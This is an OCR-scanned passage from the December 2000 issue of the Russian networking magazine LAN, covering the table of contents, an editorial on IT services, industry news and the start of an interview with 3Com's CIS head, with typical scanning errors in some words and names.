/
Текст
http://www.lanmaa.ru
Технологии стековых
коммутаторов
Использование DSL
для коллективного доступа
Атака на Windows NT
Соглашение о тестировании
кабельной проводки
Организация
видеоконференций
ДЕКАБРЬ 2000
iЖУРНАЛ СЕТЕВЫХ РЕШЕНИИ
ДЕКАБРЬ 2000 ТОМ 6 НОМЕР 12
> РАЗНОЕ
>Сегодня, наконец, расположение
планет благоприятствует и бес-
проводным локальным сетям
стандарта 802.11b, работающим
на частоте 2,4 ГГц. Они отнюдь
не рассматриваются в качестве
замены проводных локальных
сетей, но привлекают к себе вни-
мание все более и более широ-
кого круга потребителей.
4
Колонка редактора
6
Канал новостей
зСрщ принимается
за дело всерьез.
«Ландата» - дистрибьютор
оборудова нпя передачи
данных Avaya.
Radware заявляет о себе.
22
Тысяча мелочей
Маленькие «хитрости»
инсталляции сервера
NetWare 5.1.
26
Инструментарий
Укладка кабеля.
12
Интервью
Виталий Фрпдлянд,
глава представительства
в странах СНГ.
16
Сеть для всех
Заходите к нам на огонек.
28
Настольная книга
Windows 2000 для
профессионалов.
99
Путеводитель по статьям
105
Объявления
106
Индекс рекламодателей
18
Первые уроки
Протоколы
Megaco и MGCP.
107
Новшества
112
Постскриптум
Человеческий фактор.
> ТЕМА НОМЕРА
30 А кабели где?
Беспроводные локальные стили с частотой 2,4 ГГц
подходят не всем. Но многие будут удивлены тем,
насколько производительно и дешево современное
оборудование.
Джонатан Эйнджел
40 По зубам ли Bluetooth сетевые технологии?
Притязания Bluetooth не ограничиваются только
потребительским рынком. Несмотря на свою
потенциальную полезность, этот радиостандарт
с малым радиусом действия может внести серьезные
помехи в работу вашей сети.
Энди Дорнан
2 LAN/Журнал сетевых решений
Москва 125080. ул Врубеля д.12
тел.: 095.935.8W: факс: 095.935.8480; email' info@moscow.sgi.com;
www.sgi.ru
> КОРПОРАТИВНЫЕ СЕТИ
49 Технологии стековых
коммутаторов
Сравнительный анализ
используемых технологий
для объединения
коммутаторов в стек.
Александр Гусак
> КАБЕЛЬНЫЕ СИСТЕМЫ
63 Контракт на тестирование СКС
Требования по обследованию,
тестированию и приемочному
контролю структурирова н н ых
кабельных систем
внутри зданий.
Марк Джонстон
69 Контракт на тестирование
оптической системы
Требования по обследованию,
тестированию и приемочному
контролю волоконно-оптических
кабельных систем
внутри зданий.
Марк Джонстон
> СТРАТЕГИЯ
74 Лицом к лицу
Видеоконференции находят
реальное применение в
кор иоративн ых сетях.
Александр Авдуевский
> НОВЫЕ ТЕХНОЛОГИИ
82 xDSL:революция
продолжается
Перенесение точки
конце игра цн и граф и ка
ближе к абонентам
позволяет решить
многие проблемы внедрения
технологий DSL.
Сергей Шаронин
> ЗАЩИТА ИНФОРМАЦИИ
88 Атака на Windows NT
Несмотря на внутренне
и ей роти вореч и вую
модель безопасности,
ош и б к и реал иза ции
привели к появлению
слабостей в системе безопасности
ОС Windows NT, в том числе
и в ее последней версии
Windows 2000.
Крис Каслерски
> ПОУЧИТЕЛЬНЫЙ ПРИМЕР
96 Выход на орбиту
С п ути и ковы й доступ
в Internet.
Александр Авдуевский
> http://www.lanmag.ru
Декабрь 2000 3
> КОЛОНКА РЕДАКТОРА
Долой натуральное хозяйство!
BiCSi
MEMBER
На пороге второго тысячелетия Рос-
сия - от простых граждан до це-
лых отраслей экономики и регио-
нов - по-прежнему живет преимущест-
венно натуральным хозяйством. Пере-
ход на полное самообеспечение — мера
во многом вынужденная ввиду отсутст-
вия денег у большей части населения и
предприятий на приобретение необхо-
димых продуктов и услуг. Однако, даже
когда деньги все же появляются, они
идут на покупку садового участка, уста-
новку собственного дизель-генератора,
создание корпоративной сети связи, т. е.
на дальнейшее расширение возможно-
стей существования в автономном ре-
жиме, независимо от каких-либо эконо-
мических и политических передряг.
Конечно, это намеренно утрирован-
ный взгляд на ситуацию. Тем не менее
если все необходимые ему продукты ни
одно предприятие производить не в со-
стоянии. то вот за сторонними услугами
они обращаются только в самом край-
нем случае. Причины этого не только в
стремлении сэкономить, например на
техническом обслуживании, в надежде,
что все будет работать и так, но и в скла-
двигавшемся годами — еще с со-
ветских времен — недоверии
к сервису, как явлению (пере-
фразируя известную фразу,
«у нас сервиса нет»), а также
в нежелепии допускать кого-
либо постороннего к своим
внутренним системам.
Вместе с тем, жизнеде-
ятельность самых раз-
ных предприятий вне
зависимости от специ-
ализации и размера *
все в большей мере за-
висит от информаци-
онных технологий. Ес-
ли у крупных пред-
приятий есть воз-
можности и средства
для развития собст-
венной инфраструк-
туры и ее последую-
щего обслуживания,
то у небольших пред-
приятий для этого нет
ни квалифицирован-
ных специалистов, пи
средств. Все это создает по-
тенциал для развития рынка услуг в об-
ласти ИТ - от сервисного обслужива-
ния до аренды всей информационной
инфраструктуры. К тому же обращение
к сторонним услугам позволяет компа-
нии сосредоточиться на своем основном
виде деятельности.
В Internet, как в футболе, все счита-
ют себя специалистами. Однако, как и
футбол, Internet — это не только зре-
лище, но и инфраструктура. Если свою
страничку в Internet может без труда
создать каждый, то организация кор-
поративного сайта требует уже приоб-
ретения оборудования, программного
обеспечения, каналов и т. д. Отчасти
вследствие реальной экономической
необходимости, отчасти благодаря мо-
де все больше компаний стремиться
обеспечить свое присутствие в Сети.
Поэтому, как и на Западе, услуга хос-
тинга - а именно такую услугу предос-
тавляют большинство ASP — может в
ближайшей перспективе стать одной из
наиболее востребованных услуг в сфе-
ре информационных технологий в Рос-
сии. Хотелось бы думать, что это по-
служит дополнительным стимулом к
развитшо рынка информационных ус-
луг вообще.
Несмотря на неразвитость данного
рынка в России, иногда предложение
услуг опережает спрос. С одной сто-
роны, это может способствовать фор-
мированию спроса, с другой — та-
кое предложение может ос-
таться втуне, так как оно
окажется невостребо-
ванно пользователя-
ми. Однако, как в
случае поддержки
WAP и GPRS мо-
бильными опера-
торами, — это,
скорее, редкое ис-
ключение, нежели
правило. Остается
только надеяться,
что в следующем
веке нам придется
иметь дело не с пробле-
мой отсутствия услуг,
а с проблемой их из-
бытка. LAN
Дмитрий Ганьжа
Россия, 123056, Москва. Электрический пер.,
д. 8, корп. 3, комн. 208. Ian@lanmag.ru,
Тел.: (095) 253-9228, Факс: (095) 253-9204.
ГЛАВНЫЙ РЕДАКТОР
Дмитрий Ганьжа diga@lanmag.ru
ОТВЕТСТВЕННЫЙ РЕДАКТОР
Наталья Олифер olifer@lanmqg.ru
ОБОЗРЕВАТЕЛИ
Александр Авдуевский shura@lanmag.ni
Константин Пьянзин koka@lanmag.ru
КОНСУЛЬТАНТ
Давил Гальперович тел.: (095) 585-5472
ЛИТЕРАТУРНЫЕ РЕДАКТОРЫ
Мина Олевская, Мария Давыдова
КОРРЕКТОР
Л юдмила Зимилова
КОМПЬЮТЕРНАЯ ВЕРСТКА
Илья Становский ilya@tanmag.ru
ТЕХНИЧЕСКИЙ РЕДАКТОР
Наталья Жилкина
ОТДЕЛ РЕКЛАМЫ
тел.: (095) 255-9115/16,956-5506
Елена Чекалина lena@lanmag.ru
Андрей Остапенко andos@lanmag.ru
ОТДЕЛ РАСПРОСТРАНЕНИЯ
тел.: (095) 124-6585
Олег Чекалин xpress@osp.ni
ПРОИЗВОДСТВЕННЫЙ ОТДЕЛ
Галина Блохина
УЧРЕДИТЕЛЬ
Издательство -«Открытые Системы»
© 2000 Издательство
«Открытые Системы»
Все права .защищены.
Издание зарегистрировано в Комитете
Российской Федерации по печати.
Регистрационный помер015907
Подписные индексы:
72755 но каталогу АПР,
71859 по каталогу «Роспечать».
Отпечатано в ОАО ПО «Пресса-1».
Журнал выходит 12 раз в год.
Тираж 11 ооо экземпляров.
Цена свободная. Заказ №3250
CA3SL1NG
ЕЕЗЗЗИ
MAGAZINE
ОТКРЫТЫЕ
СИСТЕМЫ
ГЕНЕРАЛЬНЫЙ ДИРЕКТОР
Галина Герасина gerasina@osp.ru
ИЗДАТЕЛЬ
Михаил Борисов rnike@osp.ru
ш Miller Freeman
A United News & Media publication
4 LAN/Журнал сетевых решений
> КАНАЛ НОВОСТЕЙ
ЗСот принимается за дело всерьез 8
«Ландата» - дистрибьютор оборудования передачи данных Avaya ю
Radware заявляет о себе и
НОВИНКИ
<1
В ФОКУСЕ
Сумма слагаемых
Компании Molex Fiber Optics и Sonet Technologies
объявили о выходе на российский рынок новой
торговой марки — SoniLex. Под этой маркой Sonet
будет производить коммутационные и абонентские во-
локонно-оптические шнуры на базе компонентов
Molex. Одного того факта, что в производстве планиру-
ется применять компоненты Molex, естественно, недос-
таточно для того, чтобы компа-
ния разрешила использовать в
повой торговой марке свое имя
(точнее, его часть). Sonet органи-
зует производство в полном со-
ответствии с требованиями,
предъявляемыми Molex, в том
числе и к контролю качества. От-
крытие производств на местах,
включая созданные совместно с
партнерами, входит в обычную
практику Molex. Эта стратегия
позволяет ускорить обработку
заказов, особенно когда речь
идет о такой продукции, как ком-
мутационные шнуры. Предуга-
дать, какой будет сирое-па шну-
ры разных длин очень трудно,
поэтому дистрибьюторы и ин-
сталляторы не рискуют держать
их на складе в больших количе-
ствах. Подобную продукцию час-
то заказывают под конкретного
клиента, из-за чего сроки постав-
ки существенно возрастают. Пе-
ренося производство в Россию,
Molex и Sonet упрощают реше-
ние вопросов логистики (даже
крупный заказ может быть удов-
летворен в течение недели или
быстрее), а также снижают их
стоимость. В планах SonLex —
неуклонное повышение качества. Сегодня продукция
SonLex отвечает всем необходимым требованиям, но
новое предприятие ставит своей целью добиться соот-
ветствия внутренним, более высоким, стандартам
Molex.—Александр Авдуевский
«Мы будем стараться». Директор SonLex
Александр Московченко планирует повышать качество.
Возраст взросления
В конце ноября в Подмосковье прошла пятая ежегод-
ная конференция по компьютерной и IP-телефо-
нии, организатором которой выступила, как и ра-
нее, компания Comptek. Генеральными спонсорами кон-
ференции стали компании Cisco Systems, VocalTec,
Dialogic и TarioNet. Масштабы конференции, участие в
которой приняли около 2оо человек, представлявших
более чем 150 компаний и орга-
низаций из России и ближнего
зарубежья, заметно расшири-
лись но сравнению с прошлым
годом. Если в 1999 г. па конфе-
ренции один день был посвящен
ГР-телефонии и один день —
компьютерной телефонии, то на
сей раз конференция длилась
три дня, с двумя параллельными
тематическими сессиями. Тема-
тика конференции также пре-
терпела изменения. При несом-
ненном техническом уклоне до-
кладов участники наиболее жи-
во интересовались вопросами
практического внедрения реше-
ний и опытом своих коллег. В
секции IP-телефонии очень ин-
тенсивно обсуждались пробле-
мы взаимодействия и сосущест-
вования традиционных и аль-
тернативных операторов, а так-
же вопросы государственного
регулирования (тем более что
на конференции присутствова-
ли представители всех сторон).
Собственно обмен опытом в той
или иной форме не прекращался
все три дня, и предоставленную
возможность пообщаться с кол-
легами многие участники ис-
пользовали для установления новых полезных связей.
Наличие сложившегося сообщества профессионалов
можно считать одним из признаков того, что рынки ком-
пьютерной и IP-телефонии в России вступают уже в фа-
зу зрелости. —Александр Авдуевский
6 LAN/Журнал сетевых решений
> КАНАЛ НОВОСТЕЙ
Юбилей «Микротест»
Компания «Микротест», работающая в
области системной интеграции, отметила
свое десятилетие первой! пресс-конфе-
ренцией в Москве. Основные направле-
ния деятельности «Микротеста» — по-
строение сетей и систем связи, проекти-
рование информационных комплексов
предприятий, внедрение Internet-техно-
логий и обеспечение безопасности кор-
поративных ИС. В 2ооо г. оборот компа-
нии должен составить 8о млн долларов.
Около половины этой суммы должны
дать доходы от построения сетей и сис-
тем связи, а более четверти — от создания
локальных сетей и оборудования зданий,
Дистрибуция Axis
В связи с послекризисными изменения-
ми рынка и уменьшением объемов про-
даж компания Axis Communications со-
кращает количество прямых партнеров,
повышая эффективность работы с ними.
До кризиса в России и других странах
СНГ у Axis было семь дистрибьюторов.
Теперь их осталось двое: 23 ноября Axis
и Soft-tronik объявили о заключении
дистрибьюторского соглашения, а летом
был подписан контракт с TerraNet. В
Soft-tronik, уже три года работающей с
Axis Communications, заявляют, что со-
глашение предполагает более тесное со-
трудничество двух компаний, обеспечи-
вая предоставление кредитов и марке-
тинговую поддержку Axis.
Сервис от Enterasys .
Представители компаний Cabletron и
Enterasys объявили 24 ноября о начале в
следующем году' поставки сетевых уст-
ройств Enterasys с расширенным паке-
том сервисных услуг, при этом увеличе-
ние стоимости оборудования не плани-
руется. В состав пакета входят: замена в
течение суток неисправного оборудова-
ния устройствами со склада в Москве;
инсталляция новых версий встроенного
110; выезд специалистов к заказчикам, а
также консультации по телефону и
электронной почте. Данные услуги бу-
дут оказываться «пожизненно», в том
числе в течение трех лет после снятия
оборудования с производства. Статус
российского авторизованного центра
сервисной поддержки Enterasys полу-
чила компания «РоксаТелеком».
АЛЬЯНСЫ
Compaq становится сервисным
партнером Cisco
Московский офис Compaq объя-
вил о том, что компания стала
сервисным партнером Cisco
Systems. Соответствующее глобальное
соглашение между двумя компаниями
было подписано достаточно давно, но
российское представительство Compaq
предпочло дать официальную инфор-
мацию только после того, как формаль-
ный статус был подкреплен реальными
возможностями на месте. Подобный
договор позволит компаниям высту-
пать тандемом, прежде всего, в круп-
ных тендерах. Приобретя Digital,
Compaq унаследовала и богатый опыт
DEC в области поддержки оборудова-
ния и программного обеспечения дру-
гих производителей, поэтому появле-
ние Cisco в весьма длинном списке об-
служиваемых производителей вполне
закономерно. Соглашение также отра-
жает перемены в стратегии Compaq.
Компания более не намерена бы ть про-
сто поставщиком вычислительной тех-
РЫНОК
ЗСот принимается за дело всерьез
В ноябре ^Com сделала один из са-
мых крупных за всю свою исто-
рию анонсов, который призван
продемонстрировать, что все неуряди-
цы периода реформирования остались
позади, и компания возвращается к
своей обычной агрессивной политике.
Естественно, сам рынок, на который
нацеливается компания, несколько из-
менился с прошлого года теперь, на-
помним, jCom фокусируется на реше-
ниях для малого и среднего бизнеса. По
и для этого сегмента компания приго-
товила немало новинок, следуя «ре-
форматорскому» принципу макси-
мальной простоты в использовании и
высококонкурентных цен.
Прежде всего, новшества затронут
семейство коммутаторов SuperStack.
Па смену серии SupcrStack П придет
ники и собирается активно развивать
интеграторское направление, и с этой
точки зрения возможность предостав-
ления максимально широкой техниче-
ской поддержки и сервиса приобретает
важное значение. В определенном
смысле Compaq следует примеру весь-
ма успешного сотрудничества Cisco и
Hewlett-Packard - объединившись,
компании выиграли много серьезных
тендеров. Поскольку работа крупного
производителя в роли интегратора осу-
ществляется через партнеров, новый
статус компании играет на руку и рос-
сийским партнерам Compaq. В итоге
позиции Compaq на рынке «крупной»
системной интеграции должны упро-
читься (равно как и возрасти «пробив-
ная мощь» Cisco). Во всяком случае
перед московским офисом Compaq те-
перь стоит задача получения статуса
прямого партнера Cisco, причем «золо-
того» или «серебряного». —Алек-
сандр Авдуевский
SuperStack 3, при этом ряд продуктов
предыдущей серии перейдет в новую
это касается, в частности, анонсирован-
ных в конце лета коммутаторов
SuperStack 3300 с фиксированной кон-
фигурацией. Помимо нового названия
вновь заказываемые «переходные» уст-
ройства (это касается и переходных
продуктов других серий) обретут н по-
жизненную гарантию, распространяю-
щуюся на все новинки зСот. Первыми
представителями новой серии станут
гигабитные коммутаторы, с оптически-
ми или медными портами. Отличи-
тельной особенностью устройств с мед-
ными портами является возможность
автоматического определення скоро-
стей передачи ю/ioo/iooo. Семейство
неуправляемых коммутаторов попол-
нится новыми моделями старшего
8 LAN/Журнал сетевых решений
> КАНАЛ НОВОСТЕЙ
АйТи-СКС-Видео
Так называется вошедшее в состав стру-
ктурированной кабельной системы «Ай-
Ти-СКС» интегрированное решение
для передачи по стандартным экраниро-
ванным кабелям CDT/NEK пакетов
Ethernet со скоростью ю/ioo Мбит/с,
телефонного трафика, а также сигналов
многоканального телевещания и стерео-
фонических радиопрограмм. Для этого
используются телевизионный концент-
ратор норвежской компании Telesafe и
коммутационные разветвительные
шнуры со встроенными балунами. В ка-
ждой абонентской части устанавливает-
ся мультимедийная розетка с разъема-
ми RJ, балуном обратного преобразова-
ния, демультиплексором и двумя разъе-
мами для подключения коаксиальных
кабелей антенных вводов теле- и радио-
приемников.
Представительство Schmid
Швейцарская компания Schmid откры-
ла в Москве свое представительство в
России и странах СНГ. Основным напра-
влением деятельности представительст-
ва будет продвижение в России торговой
марки Watson. По утверждению прези-
дента компании Питера Шмида, компа-
нии принадлежит 40% российского рын-
ка оборудования DSL. Компания уже за-
ключила несколько дистрибьюторских
соглашений, в том числе со «СвязьКомп-
лект» и Race Communications. По сло-
вам директора представительства Влади-
мираУгрюмова, «ШмидТелеком Россия
и СНГ» планирует открыть в России
производство модемов Watson.
Программа обслуживания Sun
В конце ноября компания Sun
Microsystems объявила о начале реали-
зации на российском рынке новой про-
граммы технического обслуживания
SunSpectrum Platinum. Эта программа
ориентирована на корпоративных за-
казчиков и предназначена для обеспе-
чения максимально надежного функци-
онирования сложных информационных
систем. Восстановление работоспособ-
ности систем осуществляется на терри-
тории заказчика в круглосуточном ре-
жиме. По желанию заказчика специали-
сты Sun готовы разработать индивиду-
альную программу поддержки.
класса, где будет реализована поддерж-
ка гигабитных скоростей.
Наконец, в семейство OfficeConnect
войдут сразу несколько принципиаль-
но новых для компании устройств —
специализированных серверов, значи-
тельная часть которых создана в сот-
рудничестве с лидерами рынка в облас-
ти разработки соответствующих техно-
логий. Список предложений для мало-
го офиса пополнится сервером хране-
ния данных, межсетевым экраном, поч-
товым сервером и полностью интегри-
рованным Internet-сервером, объеди-
АЛЬЯНСЫ
«Ландата» - дистрибьютор
оборудования передачи данных Avaya
Компании Avaya Communication и
«Ландата» объявили 27 ноября
2000 г. о заключении партнерского
соглашения, по которому «Ландата»
получает статус оптового дистрибью-
тора оборудования Avaya по передаче
данных.
Рынок интегрированных средств
передачи голоса и данных все еще на-
ходится в стадии становления, и до
полной совместимости продуктов
разных производителей еще далеко.
В этих условиях для предприятий
крайне важно, чтобы все основные
составляющие пестрой мозаики кор-
поративной сети — офисные АТС,
коммуникационные серверы, IP —
телефоны, центры обработки вызо-
вов, коммутаторы локальных сетей,
IP-маршрутизаторы, шлюзы и при-
вратники VoIP и т. и. — были от од-
ного производителя. Получив в на-
следство от Lucent отличные исход-
ные позиции практически во всех
сегментах рынка, связанных с пере-
дачей и обработкой голоса, компания
Avaya Communication не скрывает
желания укрепить свое положение и
в области средств передачи данных.
Тем более, у нее есть что предложшь —
семейство продуктов Cajun Campus
Family, по мнению представителей
компании, вполне конкурентоспособ-
но и нуждается в более активном про-
движении на рынок.
няющим в себе все базовые функции от
электронной почты до сервера Web и
сервера печати. При создании новой
линии продуктов 3С0П1 также придер-
живалась принципа максимальной
простоты в установке и управлении.
Руководство полагает, что, после того
как все анонсированные продукты ста-
нут доступны для заказа (примерно по-
ловина из них должна появиться в те-
чение трех-четырех месяцев), jCom
снова будет весьма опасным конкурен-
том для своих соседей по рынку. —
Александр Авдуевский
С этой целью руководством Avaya
было принято решение о переходе на
двухуровневую схему дистрибуции сво-
их продуктов передачи данных на рос-
сийском рынке. При выборе оптового
дистрибьютора учитывались следую-
щие критерии: тесные связи с крупными
интеграторами, занимающимися проек-
тами на федеральном уровне; наличие
развитой сети реселлеров и дилеров; хо-
рошая организация логистики и склада;
прочное финансовое положение; высо-
кий уровень технической поддержки.
Выбор пал на «Ландата», дистрибью-
тора компьютерной техники, перифе-
рийного и сетевого оборудования. В ее
дилерскую сеть входят более 200 компа-
ний в России и СНГ, среди партнеров —
много компаний-интеграторов (пример-
но одна треть), причем около половины
из них работают в регионах. «Ландата»
является одним из учредителей Ассоци-
ации системной интеграции и разработ-
ки информационных и управляющих
систем (СИРИУС). Основное направ-
ление ее деятельности — реализация
крупных проектов регионального и фе-
дерального уровней. Момент для подпи-
сания соглашения выбран весьма удач-
но — в конце года по российской тради-
ции всегда наступает горячая пора «ос-
воения бюджетных средств», и это об-
стоятельство может способствовать хо-
рошему старту. Уже сегодня на оборудо-
вание передачи данных Avaya есть заяв-
10 LAN/Журнал сетевых решений
> КАНАЛ НОВОСТЕЙ
ки от крупных интеграторов, и продук-
ция поступает на склад «Ландата».
Представители Avaya заверили,
что соглашение с «Ландата» не приве-
дет к сокращению числа существую-
Jjr. в ФОКУСЕ
Radware заявляет
Компания Radware провела в Мо-
скве семинар, посвященный ре-
шениям для оптимизации трафи-
ка Internet. Как можно догадаться по
ее названию. Radware некогда входи-
ла в группу компаний RAD. Однако
на протяжении вот уже нескольких
лет она является самостоятельной
компанией (хотя связи с RAD сохра-
нились). У Radware достаточно узкая
специализация: все свои усилия она
концентрирует исключительно на ре-
шениях для оптимизации трафика
Internet. Как говорят представители
компании, именно это позволяет им
лидировать в данной области и ус-
пешно конкурировать с другими про-
изводителями, в том числе и «титана-
ми», несмотря на то, что последние
часто практикуют предоставление
аналогичных продуктов в рамках сво-
их проектов бесплатно или по крайне
низким ценам.
Продукты Radware предназначены
для решения следующих основных за-
дач — распределения нагрузки (load
balancing) IP-трафика между сервера-
ми (Web./ф или другими), кэш-серве-
рами, межсетевыми экранами. Особен-
ность решений Radware, вне зависимо-
сти от их уровня, состоит в том, что по-
мимо наличия гибких алгоритмов рас-
пределения нагрузки они также обес-
печивают безотказность доступа к ре-
сурсам. Устройства Radware, во-пер-
вых, образно говоря, «кластеризуют-
ся», т. е. работают в режиме взаимного
резервирования с распределением на-
грузки между собой. Во-вторых, они
отслеживают доступность ресурсов, об-
ращения к которым оптимизируют.
Например, если речь идет о классиче-
ской трехуровневой архитектуре, то
проверяется доступность не только
внешнего сервера Web, но и серверов
второго и третьего уровня.
щих реселлеров. Они могут по-преж-
нему напрямую работать с Avaya или
же, при желании, получать оборудова-
ние со складов «Ландата». —Наталья
Олифер
о себе
Radware позволяет оптимизиро-
вать трафик Internet не только локаль-
но. но и глобально. Если компания
или провайдер имеет, например, не-
сколько зеркал одних и тех же ресур-
сов в разных географических регио-
нах. то соответствующие устройства
компании (являющиеся точками вхо-
да для внешних пользователей) в от-
вет на запрос DNS выдадут адрес наи-
более быстрого, с точки зрения поль-
зователя. ресурса.
До недавнего времени на россий-
ском рынке Radware не работала.
Прошедший семинар — первое офи-
циальное представление компании в
России. Как сказал вице-президент
корпорации Uni (при поддержке ко-
торой был проведен семинар) Борис
Гольдштейн, ранее на отечественном
рынке не было реального спроса на
подобные решения, поскольку коли-
чество компаний и организаций, за-
интересованных в оптимизации тра-
фика Internet, оставалось очень не-
большим. В настоящее же время соз-
даны все предпосылки для развития
рынка. Первым партнером Radware
в России станет Uni (что не удиви-
тельно, учитывая давние тесные свя-
зи компании с RAD). Обе компании
рассчитывают создать в 2001 г. в
России некоторую инсталляцион-
ную базу. Планы партнеров не амби-
циозны. поскольку речь может идти
пока что лишь о нескольких десят-
ках заказчиков. Но, как показывает
опыт Radware, приобретенный на
мировом рынке, для начала это весь-
ма неплохо (нередко в компаниях,
купивших одно-два устройства
Radware, к концу года их насчитыва-
ется уже десятки), учитывая, что
рынок подобных решений в нашей
стране только зарождается. —Алек-
сандр Авдуевский.
Календарь событий
9-12 января
«Компьютерные
и телекоммуникационные
технологии»
IV специализированная выставка-семинар
Смоленск
(08122) 3-77-47
6-9 февраля
«Информационные Системы
для Бизнеса-Инфобизнес-2001»
2-й ежегодный специализированный
форум по корпоративным
и информационным технологиям
и управлению бизнесом
Москва
«Экслофорум»
ВВЦ, пав. 69. (095) 207-7846.
факс: (095) 916-8633
e-mail: uppilot@cityline.ru
14-16 февраля
«Broadband communications
Russia-2001»
1-я международная выставка.
Широкополосные телекоммуникации
в России
Москва
«МИДЭКСПО»
КВЦ. «Сокольники», пав. 4
тел/факс: (095) 145-5133.145-6400
e-mail: midexpo@ropnet.ru.
14-17 февраля
«Информатика»
7-я специализированная выставка
Екатеринбург
«УРАЛЭКСПОЦЕНТР»
(3432) 49-30-17, 49-30-27
факс: (3432) 49-30-19
e-mail: uralexpo@dialup.ru
20-23 февраля
«Связьинфо»
5-я выставка систем, средств связи
и коммуникаций
Омск
«Интерсиб»
(3812) 25-25-20/14-79/25-56/84-87,
23-02-91. 22-01-59/30. 23-23-30,
факс: (3812) 25-72-02
e-mail: fair@intersib. omsk. ru
> http://www.lanmag.ru
Декабрь 2000 11
> ИНТЕРВЬЮ
Глава представительства
в странах СНГ, ЗСот.
Виталий Фридлянд
Дмитрий Ганьжа
Предпринятая в этом году реструк-
туризация и реорганизация бизнеса
тремя крупнейшими поставщика-
ми сетевого оборудования Lucent
Technologies, Cabletron и %Сот оказа-
лась. с одной стороны, неожиданной. а с
другой - закономерной. Она была вызва-
на стремлением сосредоточить усилия
на нескольких приоритетных направле-
ниях и рынках, дабы не распылять силы и
средства. Однако
теперь, спустя вре-
мя после начала пре-
образований. молено
подводить некото-
рые итоги. О том.
как идут дела после
преобразований у
Lucent (и Avaya), а
также Cabletron, мы
уже имели возмож-
ность узнать у глав
poccuiu жих предала -
вительств этих
компаний. Теперь же
очередь дошла и до
$Сот. Об основных
направлениях дея-
тельности обнов-
ленной ^Сот па рос-
списком рынке мы решили поговорить с
Виталием Фридляндом, главой предста-
вительства уСот в странах СНГ.
LAN/Журнал сетевых решений: Как изме-
нилась стратегия компании после рест-
руктуризации, в частности в России?
Виталий Фридлянд: Сейчас стратегия
компании формулируется как «макси-
мальная простота и перспективная
функциональность», Что означает
«максимальная простота»? Это значит,
что, с точки зрения пользователей се-
ти, ее построение, топология, диагно-
стика и реконфигурация должны быть,
во-первых, прозрачны, а во-вторых,
просты, г. е. сеть должна строиться по
принципу конструктора Lego, о чем я
не устаю говорить вот уже год, и в
принципе опа должна обслуживаться
так же, как сейчас обслуживаются те-
лефонные линии: вы же не держите в
каждом офисе, па каждом предпри-
ятии телефонного мастера.
Что означает «перспективная функ-
циональность»? Это значит, что функ-
ции, которые возлагаются на сеть,
должны бы ть достаточно развит ы и об-
ладать наращиваемостью и масштаби-
руемостью. А кроме того, эти функции
должны реализовываться в зависимо-
сти от их применимости в данной кон-
крстной си гуанин,
т. е. в соответствии
с потребностями за-
казчика.
Что касается
стратегии, то она
состоит' в развитии
перспективных ин-
новационных тех-
нологий. Говоря о
России, я должен
сказать, что прак-
тически все страте-
гические направле-
ния, которые разра-
батывает наш го-
ловной офис, пред-
ставлены в России.
Проекты идут пра-
ктически по всем
направлениям, что и в остальном мире.
LAN: Как сейчас, спустя более полго-
да. партнеры и заказчики восприни-
мают предпринятую у Сот реструк-
туризацию?
Фридлянд: Сейчас мы вышли на столь
стабильный режим деятельности в рам-
ках поной ст ратегии 3(0111. что говорить
па эту тему уже не имеет смысла. Конеч-
но. сначала у заказчиков и партнеров
был шок. 11е в том смысле, что это кого-
то удивило, а в том, что такое решение
ЗСот потребовало определенных уси-
лий и интеллектуальных инвестиций, а
также изменения тактики поведения па
рынке. Естественно, были какие-то
ошибки, недоумение, но сейчас можно
говорить о том, что все изменения за-
кончились. мы вышли на нормальный,
стабильный, стационарный уровень вза-
имодействия с рынком, и наши продук-
ты очень популярны - мы это видим по
постуиающим заявкам.
LAN: Уйдя с рынка решений для крупных
корпоративных сетей, ^Сот сосредото-
чилась на сетях для малого и среднего
бизнеса. И хотя уСот является безус-
ловным лидером на этом рынке, однако
на нем существует весьма высокая кон-
куренция. Как уСот собирается укреп-
лять свое лидирующее положение?
Фридлянд: Я хочу сказать, что мы не уш-
ли с корпоративного рынка в том пони-
мании, каков воспринимается в странах
СНГ. гак как во всем СНГ найдется не
более двух десятков компаний, у кото-
рых в одном здании имеется сет ь с более
чем 500 рабочими местами.
Объективно, зСот является лиде-
ром рынка оборудования для построе-
ния локальных сетей, особенно в облас-
ти коммутации второго и третьего уров-
ней, адаптеров Ethernet, гигабитных
технологий, голоса по IP и т. д. Быть
лидером всегда тяжелее, чем догонять
кого-то. Поэтому если говорить о кон-
куренции с производителями, скажем
так, более дешевой техники, то }Сот
всегда отличалась двумя вещами: во-
первых, это высочайшая степень надеж-
ности оборудования и. во-вторых, высо-
кая культура и нателгопримеиимость.
Сейчас большинство первичных патен-
тов - около боо — в области техноло-
гий для локальных сетей сосредоточено
в руках зСот.
Понятно, что если вскрыть любой
концентратор — Allied Telesyn. Intel,
Hewlett-Packard и т. д„ то по своей сути
они ничем не отличаются, так как их
функции одинаковы. Более того, произ-
водители компонентов одни и те же. Та-
ким образом, качественное отличие за-
ключается в поддержке решений и в
раскрученное™ марки. При необходи-
мости построить сеть па сто рабочих
мест, когда требования к ее надежности
очень высоки, заказчик, при наличии
средств, выберет оборудование зСот.
Эго просто другая ценовая ниша — кто-
то ездит на «Запорожце», а кто-то на
«Mercedes».
12 LAN/Журнал сетевых решений
> ИНТЕРВЬЮ
LAN: Кого Вы рассматриваете в качест-
ве своих основных конкурентов на этом
рынке?
Фридлянд: Вообще, конкуренция идет не
на уровне устройств, а на уровне реше-
ний — предоставляемых услуг, раскру-
ченндсти торговой марки, совместимо-
сти и т. д. Это очень гонкие нюансы, поэ-
тому я бы не стал сейчас говорить о при-
митивной конкуренции между сетевыми
производителями. Кроме того, сеть - это
всего лишь кусочек информационной си-
стемы. Сеть под UNIX — это одно, сеть
под Windows — другое, а сеть, где требу-
ется удаленный доступ, — третье. Однако
в конечном итоге все определяется функ-
ционирующими в ней приложениями.
Иными словами, сеть сама по себе не су-
ществует. Это как у Райкина: «К пугови-
цам прет ензии есть? Ист. А к э тому ру-
каву претензии есть? - Нет». А в целом к
пиджаку претензии есть. Так вот, сеть со-
ставляет лишь «скелет» информацион-
ной системы.
LAN: Каково соотношение между по-
ставками оборудования под конкретные
проекты и, условно говоря, продажами в
розницу через партнеров?
Фридлянд: Это устаревший взгляд на
ситуацию в сфере информационных
технологий. Сейчас нет столь уж прин-
ципиального разделения между проект-
ным и непроектным бизнесом. Напри-
мер, соединить четыре компьютера и ус-
тановить на них приложения для
SAP/R} может стоить дороже, чем объе-
динить в сеть 150 компьютеров и устано-
вить на них приложения Microsoft
Office. Поэтому, с моей точки зрения,
производить деление на проекты и не
проекты, сейчас невозможно.
Наша стратегия продаж состоит в
